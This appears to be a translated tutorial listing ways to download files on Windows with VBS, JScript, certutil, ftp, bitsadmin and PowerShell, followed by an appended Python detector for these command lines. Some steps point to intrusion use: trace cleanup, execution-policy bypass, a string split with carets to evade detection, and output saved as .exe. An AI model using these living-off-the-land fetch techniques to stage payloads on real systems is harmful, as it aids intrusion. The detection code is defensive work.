Windows command-line file download

1. Downloading a file with VBS

1. Run the following command to echo out a VBS file

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>downfile.vbs

2. Download using the VBS script

cscript downfile.vbs http://www.baidu.com/robots.txt C:\Users\John\Desktop\test.txt

3. A non-interactive VBS script is as follows

' Source URL and local destination path
strFileURL = "http://www.baidu.com/robots.txt"
strHDLocation = "c:\test\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    ' Write the binary response body to disk through ADODB.Stream
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    ' Remove any existing file at the destination first
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing

2. Downloading a file with certutil

1. Download the file

certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt

2. Clean up traces

certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt delete

3. Downloading a file with ftp

echo open 192.168.1.115 21> ftp.txt
rem user name
echo 123>> ftp.txt
rem password
echo 123>> ftp.txt
rem binary mode
echo binary >> ftp.txt
echo get robots.txt >> ftp.txt
echo bye >> ftp.txt

rem download
ftp -s:ftp.txt

4. Downloading a file with JS

1. The downfile.js file is as follows

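var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
// Synchronous GET of the URL passed as the first argument
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Write the binary response body to disk through ADODB.Stream
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// Output file name ("保存的文件.exe" means "saved file.exe")
BinStream.SaveToFile("保存的文件.exe");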

2. Command

cscript /nologo downfile.js http://www.baidu.com/robots.txt

5. Downloading a payload with bitsadmin

1. bitsadmin is built into Windows 7 and later; usage is as follows:

bitsadmin /rawreturn /transfer down "https://www.baidu.com/robots.txt" C:\Users\John\Desktop\test666.exe

2. If the file being downloaded is large, use the following command to raise the priority

bitsadmin /setpriority down foreground

6. Downloading a file with PowerShell

6.1 Downloading with a PowerShell script file

6.1.1 PowerShell version 2

1. The test.ps1 file is as follows:

$Urls = @()
$Urls += "http://www.baidu.com/robots.txt"
$OutPath = "C:\Users\John\Desktop\"
ForEach ($item in $Urls) {
    $file = $OutPath + ($item).split('/')[-1]
    (New-Object System.Net.WebClient).DownloadFile($item, $file)
}

2. Command

powershell -File test.ps1

6.1.2 PowerShell version 3

1. The contents of down.ps1 are as follows

$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

2. Command:

powershell -File down.ps1

6.2 One-liner download

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://www.baidu.com/robots.txt','E:\robots.txt')
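
Added example (not part of the original page): a small matcher that flags the command-line download patterns listed above in process-creation events. The rule labels, function names and sample events are constructed for illustration; the sample command lines reuse the commands shown on this page.

```python
import re

# Added example. Rules are derived only from the command lines shown on this
# page: (label, process image regex, command-line regex).
RULES = [
    ("certutil urlcache", r"^certutil(\.exe)?$", r"[-/]urlcache\b.*https?://"),
    ("bitsadmin transfer", r"^bitsadmin(\.exe)?$", r"/transfer\b.*https?://"),
    ("script host with URL", r"^[cw]script(\.exe)?$", r"\.(vbs|js)\b.*https?://"),
    ("ftp script file", r"^ftp(\.exe)?$", r"-s:\S+"),
    ("powershell web download", r"^powershell(\.exe)?$",
     r"downloadfile\s*\(|invoke-webrequest\b"),
]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (image path, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt"),
    (r"C:\Windows\System32\cscript.exe",
     r"cscript downfile.vbs http://www.baidu.com/robots.txt C:\Users\John\Desktop\test.txt"),
    (r"C:\Windows\System32\bitsadmin.exe",
     r'bitsadmin /rawreturn /transfer down "https://www.baidu.com/robots.txt" C:\test666.exe'),
    (r"C:\Windows\System32\ftp.exe", "ftp -s:ftp.txt"),
    (PS, "powershell -exec bypass -c (new-object System.Net.WebClient)"
         ".DownloadFile('http://www.baidu.com/robots.txt','E:\\robots.txt')"),
    # Not flagged: the URL lives inside the script file, so the command line
    # alone is not enough (script block logging would be needed).
    (PS, "powershell -File test.ps1"),
    # Benign certutil use, must not be flagged.
    (r"C:\Windows\System32\certutil.exe", "certutil.exe -hashfile report.pdf SHA256"),
]

def classify(image, cmdline):
    """Return the labels of every rule matching one process-creation event."""
    name = image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    # Drop cmd.exe caret escapes so keywords split with ^ still match.
    cmd = cmdline.replace("^", "").lower()
    return [label for label, img_re, cmd_re in RULES
            if re.search(img_re, name) and re.search(cmd_re, cmd)]

def scan(events):
    """Return (command line, labels) for each event that matched a rule."""
    hits = [(cmd, classify(img, cmd)) for img, cmd in events]
    return [(cmd, labels) for cmd, labels in hits if labels]

if __name__ == "__main__":
    for cmd, labels in scan(SAMPLE_EVENTS):
        print(", ".join(labels), "<-", cmd)
```

Script-file variants (a hard-coded URL inside a .vbs or .ps1 file, as in sections 1 and 6.1) leave no URL on the command line, so this matcher must be paired with script content logging or network telemetry.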